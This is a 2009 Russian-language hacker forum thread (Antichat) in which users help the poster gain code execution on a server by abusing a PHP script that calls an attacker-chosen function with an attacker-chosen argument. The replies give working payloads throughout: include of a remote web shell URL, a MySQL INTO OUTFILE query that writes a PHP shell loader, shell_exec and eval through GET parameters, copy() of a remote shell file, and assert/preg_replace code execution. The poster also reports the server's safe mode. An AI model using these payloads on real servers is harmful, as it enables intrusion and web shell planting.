 |
|
02.02.2009, 04:39
|
|
Новичок
Регистрация: 23.05.2007
Сообщений: 19
С нами:
9984613
Репутация:
7
|
|
взлом 1 функцией
точнее взлом с помощью 2 переменных)
возможно ли?)
соответственно $a и $b можно подставить свои
system,exec не катят)
readfile работает,но толку от чтения файлов нет) |
|
|
02.02.2009, 12:03
|
|
Постоянный
Регистрация: 31.07.2002
Сообщений: 312
С нами:
12513535
Репутация:
187
|
|
$a=include
$b='http://oneline.ucoz.ru/madshell.php'
|
|
|
|
02.02.2009, 12:19
|
|
Members of Antichat - Level 5
Регистрация: 09.05.2008
Сообщений: 304
С нами:
9477026
Репутация:
2362
|
|
Сообщение от Dr.Frank
$a=include
$b='http://oneline.ucoz.ru/madshell.php'
Это не функция, а языковая конструкция
PHP код:
$a = array('include', 'require', 'eval');
var_dump(array_map('function_exists', $a));
ps: вопрос весьма интересный, перерываю php.net 
UPD:
первая идея. Ограничения: должен быть установлен коннект к базе и у пользователя бд должны быть File priv
Функция - mysql_query, параметр
select '<?php include "http://site.ru/shell.txt"; ?>' into outfile '/путь_до_корня_сервера/shell.php'
Последний раз редактировалось oRb; 02.02.2009 в 12:34..
|
|
|
|
02.02.2009, 13:44
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
?a=shell_exec&b=you command
шелл, но без вывода.
|
|
|
|
02.02.2009, 14:01
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
copy("http://xaker.ru/shell.txt", "shell.php");
eval($_GET[id]);
вариантов масса
|
|
|
|
02.02.2009, 14:04
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
eval, system, exec и некоторые другие в случае ТСа не пашут. Проверял.
copy требует 2 параметра, но есть только 1. функция не будет вызвана. Читай внимательнее
|
|
|
|
02.02.2009, 15:20
|
|
Новичок
Регистрация: 23.05.2007
Сообщений: 19
С нами:
9984613
Репутация:
7
|
|
благодаря
выяснилось что на серве safe mode - ON )
потому все "вкусные" функции не пашут) |
|
|
|
03.02.2009, 06:27
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от BlackSun
eval, system, exec и некоторые другие в случае ТСа не пашут. Проверял.
copy требует 2 параметра, но есть только 1. функция не будет вызвана. Читай внимательнее
А так ?
site.ru/script.php?1=http://xaker.ru/shell.txt&2=shell.php&a=copy&b=$_GET[1],$_GET[2]
не работает, такая конуструкция почему то( проверил щас на тестовом скрипте... Но по идее можно изгальнутся и придумать что то)
Последний раз редактировалось попугай; 03.02.2009 в 06:44..
|
|
|
|
03.02.2009, 06:44
|
|
Познавший АНТИЧАТ
Регистрация: 01.04.2007
Сообщений: 1,268
С нами:
10058786
Репутация:
4589
|
|
Сообщение от попугай
А так ?
site.ru/script.php?1=http://xaker.ru/shell.txt&2=shell.php&a=copy&b=$_GET[1],$_GET[2]
Ты хоть пробовал?
ubuntu LAMP
Warning: Wrong parameter count for copy() in /var/www/f23.php on line 2
не работает, такая конуструкция почему то( проверил щас на тестовом скрипте... Но по идее можно изгальнутся и придумать что то)
В том и фишка, если бы все было так просто) ...
Последний раз редактировалось BlackSun; 03.02.2009 в 06:46..
|
|
|
|
03.02.2009, 20:08
|
|
Постоянный
Регистрация: 14.07.2005
Сообщений: 964
С нами:
10960226
Репутация:
1424
|
|
уже давно пора забить на всякие *exec - туфта все
assert и все дела ) это если один аргумент $b, если можно два - то ченить с коллбеком, если три - то preg_replace.
Последний раз редактировалось ShAnKaR; 04.02.2009 в 02:20..
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
Похожие темы
|
| Тема |
Автор |
Раздел |
Ответов |
Последнее сообщение |
|
Взлом паролей.
|
Xak-Pass |
Freelance - О Работе |
1 |
20.01.2009 01:32 |
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
